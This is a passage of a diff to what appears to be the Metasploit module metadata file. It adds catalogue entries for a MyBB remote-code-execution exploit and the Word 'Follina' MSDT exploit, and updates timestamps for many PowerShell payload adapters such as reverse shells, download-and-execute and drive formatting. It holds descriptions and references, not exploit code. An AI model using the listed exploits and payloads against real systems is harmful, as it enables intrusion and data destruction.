+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix (In-Memory)",
+      "Linux (Dropper)",
+      "Windows (In-Memory)",
+      "Windows (Dropper)"
+    ],
+    "mod_time": "2022-05-30 16:24:18 +0000",
+    "path": "/modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/mybb_rce_cve_2022_24734",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/nas4free_php_exec": {
    "name": "NAS4Free Arbitrary Remote Code Execution",
    "fullname": "exploit/multi/http/nas4free_php_exec",
@@ -87306,7 +87567,7 @@
      "PHP",
      "Shell Command"
    ],
-    "mod_time": "2021-11-23 07:58:07 +0000",
+    "mod_time": "2022-06-03 11:23:53 +0000",
    "path": "/modules/exploits/multi/http/php_fpm_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/php_fpm_rce",
@@ -103350,7 +103611,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/bolt_authenticated_rce",
@@ -103358,7 +103619,9 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
-      "NOCVE": "0day",
+      "NOCVE": [
+        "0day"
+      ],
      "Stability": [
        "service-resource-loss"
      ],
@@ -117763,7 +118026,7 @@
    "description": "This module exploits a vulnerability in the update functionality of\n        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n        Anti-Exploit consumer 1.03.1.1220.\n        Due to the lack of proper update package validation, a man-in-the-middle\n        (MITM) attacker could execute arbitrary code by spoofing the update server\n        data-cdn.mbamupdates.com and uploading an executable. This module has\n        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
    "references": [
      "CVE-2014-4936",
-      " OSVDB-116050",
+      "OSVDB-116050",
      "URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
    ],
    "platform": "Windows",
@@ -117778,7 +118041,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-10 08:47:41 +0000",
    "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/malwarebytes_update_exec",
@@ -132278,6 +132541,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/fileformat/word_msdtjs_rce": {
+    "name": "Microsoft Office Word MSDTJS",
+    "fullname": "exploit/windows/fileformat/word_msdtjs_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-29",
+    "type": "exploit",
+    "author": [
+      "nao sec",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.",
+    "references": [
+      "CVE-2022-30190",
+      "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/",
+      "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19",
+      "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+      "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
+      "URL-https://twitter.com/GossiTheDog/status/1531608245009367040",
+      "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Microsoft Office Word"
+    ],
+    "mod_time": "2022-06-02 00:58:20 +0000",
+    "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/word_msdtjs_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Follina"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/fileformat/word_mshtml_rce": {
    "name": "Microsoft Office Word Malicious MSHTML RCE",
    "fullname": "exploit/windows/fileformat/word_mshtml_rce",
@@ -170400,7 +170723,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-19 11:28:26 +0000",
+    "mod_time": "2022-06-15 13:25:25 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -170438,7 +170761,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/adduser",
@@ -170477,7 +170800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -170516,7 +170839,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp",
@@ -170554,7 +170877,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp",
@@ -170593,7 +170916,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid",
@@ -170630,7 +170953,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe",
@@ -170667,7 +170990,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp",
@@ -170705,7 +171028,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp",
@@ -170745,7 +171068,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4",
@@ -170783,7 +171106,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid",
@@ -170820,7 +171143,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/find_tag",
@@ -170859,7 +171182,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_hop_http",
@@ -170896,7 +171219,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http",
@@ -170933,7 +171256,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore",
@@ -170971,7 +171294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp",
@@ -171008,7 +171331,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp",
@@ -171045,7 +171368,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp",
@@ -171083,7 +171406,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp",
@@ -171121,7 +171444,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports",
@@ -171160,7 +171483,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns",
@@ -171200,7 +171523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4",
@@ -171240,7 +171563,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns",
@@ -171278,7 +171601,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid",
@@ -171316,7 +171639,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp",
@@ -171351,7 +171674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dns_txt_query_exec",
@@ -171386,7 +171709,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/download_exec",
@@ -171422,7 +171745,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/exec",
@@ -171459,7 +171782,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/format_all_drives",
@@ -171497,7 +171820,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/debug_trap",
@@ -171532,7 +171855,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/tight_loop",
@@ -171568,7 +171891,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/loadlibrary",
@@ -171604,7 +171927,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/messagebox",
@@ -171644,7 +171967,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp",
@@ -171684,7 +172007,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp",
@@ -171723,7 +172046,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp",
@@ -171762,7 +172085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid",
@@ -171801,7 +172124,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe",
@@ -171840,7 +172163,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp",
@@ -171879,7 +172202,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp",
@@ -171920,7 +172243,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4",
@@ -171959,7 +172282,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid",
@@ -171997,7 +172320,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/find_tag",
@@ -172038,7 +172361,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_hop_http",
@@ -172077,7 +172400,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http",
@@ -172116,7 +172439,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore",
@@ -172155,7 +172478,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https",
@@ -172196,7 +172519,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https_proxy",
@@ -172235,7 +172558,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp",
@@ -172273,7 +172596,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe",
@@ -172312,7 +172635,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp",
@@ -172351,7 +172674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp",
@@ -172390,7 +172713,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp",
@@ -172429,7 +172752,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports",
@@ -172469,7 +172792,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns",
@@ -172510,7 +172833,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4",
@@ -172551,7 +172874,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns",
@@ -172590,7 +172913,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid",
@@ -172630,7 +172953,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp",
@@ -172670,7 +172993,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps",
@@ -172705,7 +173028,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_bind_tcp",
@@ -172740,7 +173063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp",
@@ -172779,7 +173102,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -172818,7 +173141,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp",
@@ -172856,7 +173179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp",
@@ -172895,7 +173218,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid",
@@ -172932,7 +173255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe",
@@ -172969,7 +173292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp",
@@ -173007,7 +173330,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
